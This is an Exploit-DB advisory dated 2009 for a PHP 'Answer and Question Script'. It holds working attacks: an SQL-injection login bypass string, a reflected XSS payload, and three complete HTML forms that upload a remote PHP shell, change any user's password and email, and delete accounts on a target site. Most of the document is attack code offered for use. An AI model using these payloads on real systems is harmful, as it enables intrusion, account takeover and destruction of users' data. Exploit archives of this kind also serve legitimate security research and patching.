- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 8690
- Проверка EDB
-
- Пройдено
- Автор
- INJECTOR5
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2009-1665 cve-2009-1664 cve-2009-1663 cve-2009-1655 cve-2009-1654
- Дата публикации
- 2009-05-14
Код:
|| || | ||
o_,_7 _|| . _o_7 _|| 4_|_|| o_w_,
( : / (_) / ( .
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
| _ __ __ __ ______ |
| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ |
| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ |
| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ |
| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ |
| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ |
| \ \____/ >> Kings of injection |
| \/___/ |
| |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
<<!>> Found by : Cyb3r-1sT
<<!>> C0ntact : cyb3r-1st [at] hotmail.com
<<!>> Groups : InjEctOr5 T3am
=======================================================
+++++++++++++++++++ Script information+++++++++++++++++
=======================================================
<<->> script :: Answer and Question Script
<<->> download ::
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
<<->> Exploit ::
... bypass sql injection ...
goto login section .. and put in user name ' or 1=1-- and in pass ' or 1=1--
... XSS ...
www.cyb3r.1st/ [path] / questiondetail.php?questionid="><script>alert(1)</script>
=======================================================
++++++++++++++++++++++ Greetz +++++++++++++++++++++++++
=======================================================
<<->> All freinds , [ www.tryag.com ] , [ www.7rs.org ] , [ www.sec-code.com ]
######################################################################################################################
Upload Vulnerability
######################################################################################################################
<html dir="rtl">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Cyb3R-1sT</title>
</head>
<script language="javascript">
function frmCr()
{
document.frmCrRegister.action=document.frmCrRegister.siteurl.value+'/myaccount.php';
document.frmCrRegister.submit();
}
</script>
<form method="post" enctype="multipart/form-data" name="frmCrRegister" onSubmit="return frontcreateaccount();">
<body bgcolor="#000000">
<p align="center"><b><font size="6" color="#996633">Cyb3R-1sT</font></b></p>
<p align="center"><font color="#808000" size="4" face="Times New Roman">cyb3r-1st [at ]
hotmail.com</font></p>
<p align="center"><font size="5" color="#C0C0C0">Inject0r5 Team</font></p>
<p dir="ltr" align="center"><font size="5" color="#808000">: Sp.Greetz : </font>
</p>
<p align="center" dir="ltr"><font color="#808080" style="font-size: 15pt">All freinds .
M~Carezma . [ www.tryag.com ] . [ www.7rs.org ] . [ www.sec-code.com ]</font></p>
<div align="center">
<p dir="ltr"><font color="#333399" size="6">: Exploit :</font></p>
<p dir="ltr"><font size="4" color="#008000">Answer and Question Script
Remote Shell Upload Vulnerability</font></p>
<table border="1" width="76%" bordercolorlight="#008080" bordercolordark="#006666">
<tr>
<td>
<p align="left"> </p>
<p align="left" dir="ltr"><font color="#FFFFFF">
<font size="4">
Site :
<input name="siteurl" type="text" value="http://" size="40"><br>
User-id :
<input type="text" name="userid" id="userid" value="" size="20" /><br>
Shell :
<input type="file" name="txtphoto" id="txtphoto" value="Sunset.jpg" size="23" /></font></font><br><br>
<input type="submit" name="cmdUpdate" id="cmdUpdate" value="Update" onclick="frmCr()"> </p>
<p align="center" dir="ltr"><font size="4" color="#808080">Note : ur
shell will be here :- http://Cyb3R-1sT.com/uploads/user/shell.php</font></p>
<p align="left" dir="ltr">
</p>
</td>
</tr>
</table>
</div>
</body>
</html>
######################################################################################################################
Change Passwords
######################################################################################################################
<html dir="rtl">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Cyb3R-1sT</title>
</head>
<script language="javascript">
function frmCr()
{
document.frmCrRegister.action=document.frmCrRegister.siteurl.value+'/myaccount.php';
document.frmCrRegister.submit();
}
</script>
<form method="post" enctype="multipart/form-data" name="frmCrRegister" onSubmit="return frontcreateaccount();">
<body bgcolor="#000000">
<p align="center"><b><font size="6" color="#996633">Cyb3R-1sT</font></b></p>
<p align="center"><font color="#808000" size="4" face="Times New Roman">cyb3r-1st [at ]
hotmail.com</font></p>
<p align="center"><font size="5" color="#C0C0C0">Inject0r5 Team</font></p>
<p dir="ltr" align="center"><font size="5" color="#808000">: Sp.Greetz : </font>
</p>
<p align="center" dir="ltr"><font color="#808080" style="font-size: 15pt">All
freinds . M~Carezma . [ www.tryag.com ] . [ www.7rs.org ] . [ www.sec-code.com ]</font><font color="#808080" size="5">
</font></p>
<p align="center"> </p>
<div align="center">
<p dir="ltr"><font color="#333399" size="6">: Exploit :</font></p>
<p dir="ltr"><font size="4" color="#008000">Answer and Question Script
Remote User Options Changer Exploit</font></p>
<table border="1" width="75%" bordercolorlight="#008080" bordercolordark="#006666">
<tr>
<td>
<p align="left"> </p>
<p align="left" dir="ltr"><font color="#FFFFFF">
<font size="4">
Site :
<input name="siteurl" type="text" value="http://" size="40"><br>
Username :
<input type="text" name="txtusername" value="" size="20"><br>
User-id :
<input type="text" name="userid" id="userid" value="" size="20" /><br>
Password :
<input type="password" name="txtpassword" value="" size="20"><br>
Re-Type Password :
<input type="password" name="txtRpassword" value="" size="20"><br>
E-Mail : </font></font>
<input name="txtmail" type="text" value="" size="36"><br><br>
<input type="submit" name="cmdUpdate" id="cmdUpdate" value="Update" onclick="frmCr()"> </p>
<p align="left" dir="ltr">
</p>
</td>
</tr>
</table>
</div>
</body>
</html>
######################################################################################################################
Remove Accounts
######################################################################################################################
<html dir="rtl">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Cyb3R-1sT</title>
</head>
<script language="javascript">
function frmCr()
{
document.frmCrRegister.action=document.frmCrRegister.siteurl.value+'/myaccount.php';
document.frmCrRegister.submit();
}
</script>
<form method="post" enctype="multipart/form-data" name="frmCrRegister" onSubmit="return frontcreateaccount();">
<head>
<body bgcolor="#000000">
<p align="center"><b><font size="6" color="#996633">Cyb3R-1sT</font></b></p>
<p align="center"><font color="#808000" size="4" face="Times New Roman">cyb3r-1st [at ]
hotmail.com</font></p>
<p align="center"><font size="5" color="#C0C0C0">Inject0r5 Team</font></p>
<p dir="ltr" align="center"><font size="5" color="#808000">: Sp.Greetz : </font>
</p>
<p align="center" dir="ltr"><font color="#808080" style="font-size: 15pt">All
freinds . M~Carezma . [ www.tryag.com ] . [ www.7rs.org ] . [ www.sec-code.com ]</font><font color="#808080" size="5"> </font></p>
<p align="center"> </p>
<div align="center">
<p dir="ltr"><font color="#333399" size="6">: Exploit :</font></p>
<p dir="ltr"><font color="#008000" size="4">Answer and Question Script
remove user Vulnerability</font></p>
<table border="1" width="77%" bordercolorlight="#008080" bordercolordark="#006666">
<tr>
<td>
<p align="left"> </p>
<p align="left" dir="ltr"><font color="#FFFFFF">
<font size="4">
Site :
<input name="siteurl" type="text" value="http://" size="40"><br>
User-id :
<input type="text" name="userid" id="userid" value="" size="20" /><br></font></font><br>
<input type="submit" name="cmdUpdate" id="cmdUpdate" value="Update" onclick="frmCr()"> </p>
<p align="left" dir="ltr"> </p>
</td>
</tr>
</table>
</div>
</body>
</html>
# milw0rm.com [2009-05-14]
- Источник
- www.exploit-db.com